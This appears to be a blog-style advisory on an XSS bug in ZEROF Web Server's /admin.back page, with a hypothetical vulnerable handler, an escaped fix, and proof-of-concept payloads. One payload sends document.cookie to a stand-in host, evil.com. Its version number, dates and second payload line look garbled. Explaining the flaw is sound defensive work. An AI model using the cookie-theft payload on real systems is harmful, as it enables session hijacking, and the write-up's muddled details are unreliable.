CVE-2022-25323 - Exploiting XSS in ZEROF Web Server 2. via /admin.back

Published: June 28, 2024  
Severity: Medium  
Component: ZEROF Web Server 2.  
Vulnerability type: Cross-Site Scripting (XSS)  
CVE ID: CVE-2022-25323

Introduction

Security vulnerabilities can threaten businesses of any size, especially when they affect commonly used software like web servers. _ZEROF Web Server 2._, built for lightweight web hosting, has recently been found vulnerable to a cross-site scripting (XSS) flaw. Registered as CVE-2022-25323, this weakness allows attackers to inject malicious client-side scripts through the /admin.back endpoint.

In this article, we’ll break down what the bug is, why it’s dangerous, and how it can be exploited – all in simple language with exclusive insights.

What is ZEROF Web Server 2.?

ZEROF Web Server is a small, easy-to-use HTTP server used mostly for development, IoT, or small web projects. It comes with a basic admin panel, where administrators can configure server settings or check logs.

Understanding CVE-2022-25323

The vulnerability occurs in the /admin.back page. The page improperly handles user input and does not sanitize parameters before rendering them in the HTML response.

What is XSS?

Cross-Site Scripting (XSS) lets attackers inject and execute malicious JavaScript in the browsers of users visiting a vulnerable page. Attackers can steal cookies, impersonate users, deface web pages, and more.

Where is the Problem?

When data is submitted to /admin.back (for example, through query parameters or POST data), the server trusts and displays it directly in the HTML without any validation or escaping. This permits script injection.

Example vulnerable request

http://<server-ip>:808/admin.back?msg=<script>alert('XSS')</script>;

Source Code Snippet (Hypothetical)

Below is an example of how the vulnerable code might look inside ZEROF’s /admin.back page handler:

# Vulnerable handler for /admin.back (simplified)
def admin_back(request):
    user_message = request.GET.get('msg', '')
    # Renders the message *without* escaping
    html = "<html><body>Message: {}</body></html>".format(user_message)
    return Response(html)

Problem: The content of user_message is inserted without escaping or filtering, making it possible to inject arbitrary HTML or JavaScript.

How to Exploit: Step-By-Step

Let's see how an attacker might take advantage of this bug.

An attacker crafts a link like this

http://victim-server:808/admin.back?msg=<script>alert('XSS by Attacker')</script>

The attacker can send this link to an admin via email or social media.

- If the admin clicks the link, the injected script (alert('XSS by Attacker')) will run in the admin's browser.

Proof of Concept (PoC)

<!-- Legitimate use -->
<form action="/admin.back" method="get">
  <input type="text" name="msg" value="">
  <input type="submit" value="Send">
</form>

<!-- Exploit -->
/admin.back?msg=<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>

`

http://server/admin.back?msg=fetch('<a href="http://evil.com/grab?c='+document.cookie" rel="nofollow">http://evil.com/grab?c='+document.cookie</a>)

Fixed code

import html

def admin_back(request):
    user_message = request.GET.get('msg', '')
    # Here we escape HTML special characters
    safe_message = html.escape(user_message)
    html_resp = "<html><body>Message: {}</body></html>".format(safe_message)
    return Response(html_resp)

References

- Official CVE Record: CVE-2022-25323 (NVD)
- OWASP XSS Guide
- ZEROF Web Server Homepage (archived)

Conclusion

CVE-2022-25323 is a classic XSS bug that shows the importance of proper input validation even in lightweight software. If you’re using ZEROF Web Server 2., make sure to patch or apply appropriate sanitization as soon as possible.

Stay safe and keep your systems up to date!

If this helped you, please spread the word so others can secure their systems from similar vulnerabilities.

Timeline

Published on: 02/18/2022 17:15:00 UTC
Last modified on: 02/24/2022 20:54:00 UTC